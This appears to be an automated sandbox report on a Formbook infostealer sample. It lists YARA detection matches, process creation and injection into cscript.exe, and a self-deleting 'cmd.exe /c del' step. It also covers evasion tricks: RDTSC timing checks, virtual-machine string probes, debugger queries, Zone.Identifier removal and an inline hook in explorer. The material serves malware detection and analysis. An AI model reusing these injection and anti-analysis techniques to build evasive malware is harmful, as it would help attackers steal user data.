          Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.359609187.0000000003FE5000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.401988886.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.359423289.0000000003E79000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.402861692.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.700544777.0000000000D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.402643394.0000000001250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.700734017.00000000010F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@5/3
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bXFjrxjRlb.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to behavior
          Source: bXFjrxjRlb.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: bXFjrxjRlb.exeVirustotal: Detection: 27%
          Source: bXFjrxjRlb.exeReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Users\user\Desktop\bXFjrxjRlb.exe 'C:\Users\user\Desktop\bXFjrxjRlb.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: bXFjrxjRlb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: bXFjrxjRlb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
          Source: Binary string: cscript.pdbUGP source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: AddInProcess32.pdb source: AddInProcess32.exe, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000001.00000002.403405554.0000000001310000.00000040.00000001.sdmp, cscript.exe, 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: AddInProcess32.exe, cscript.exe
          Source: Binary string: AddInProcess32.pdbpw source: AddInProcess32.exe, 00000001.00000002.402103553.00000000009E2000.00000002.00020000.sdmp, cscript.exe, 00000007.00000002.702386130.0000000004C9F000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
          Source: Binary string: cscript.pdb source: AddInProcess32.exe, 00000001.00000002.405156768.0000000002FA0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.388503326.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041781D push ebp; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00417963 push FFFFFFE1h; iretd
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041712C push es; retf
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041EAB0 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041E41F push dword ptr [42F9B798h]; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CEC5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CF7C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CF12 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0041CF1B push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0138D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_047ED0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E781D push ebp; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E712C push es; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003E7963 push FFFFFFE1h; iretd
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003EEAB0 pushad ; retf
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003EE41F push dword ptr [42F9B798h]; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003ECEC5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003ECF1B push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003ECF12 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 7_2_003ECF7C push eax; ret
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeFile opened: C:\Users\user\Desktop\bXFjrxjRlb.exe\:Zone.Identifier read attributes | delete
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x86 0x6E 0xEA
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000003D98E4 second address: 00000000003D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exeRDTSC instruction interceptor: First address: 00000000003D9B5E second address: 00000000003D9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 5048Thread sleep time: -1844674407370954s >= -30000s
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 4112Thread sleep count: 138 > 30
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 1992Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exe TID: 6364Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4532Thread sleep count: 51 > 30
          Source: C:\Windows\explorer.exe TID: 4532Thread sleep time: -102000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 3452Thread sleep time: -110000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000002.00000000.385038972.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000002.00000000.384962824.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vmware svga
          Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: tpautoconnsvc#Microsoft Hyper-V
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: cmd.txtQEMUqemu
          Source: explorer.exe, 00000002.00000002.713752043.0000000006300000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000002.00000002.713961685.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vmsrvc
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
          Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: virtual-vmware pointing device
          Source: bXFjrxjRlb.exe, 00000000.00000002.356031561.0000000000939000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: explorer.exe, 00000002.00000002.713961685.0000000006420000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000002.00000000.384962824.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vmusrvc
          Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vmtools
          Source: explorer.exe, 00000002.00000000.384844783.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: bXFjrxjRlb.exe, 00000000.00000002.359141236.0000000003531000.00000004.00000001.sdmpBinary or memory string: vboxservicevbox)Microsoft Virtual PC
          Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.384844783.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000002.00000000.385038972.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: bXFjrxjRlb.exe, 00000000.00000002.360416763.0000000004C60000.00000002.00000001.sdmp, explorer.exe, 00000002.00000000.380338365.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000002.00000002.700588761.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\bXFjrxjRlb.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01343D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013BA537 mov eax, dword ptr fs:[00000030h]
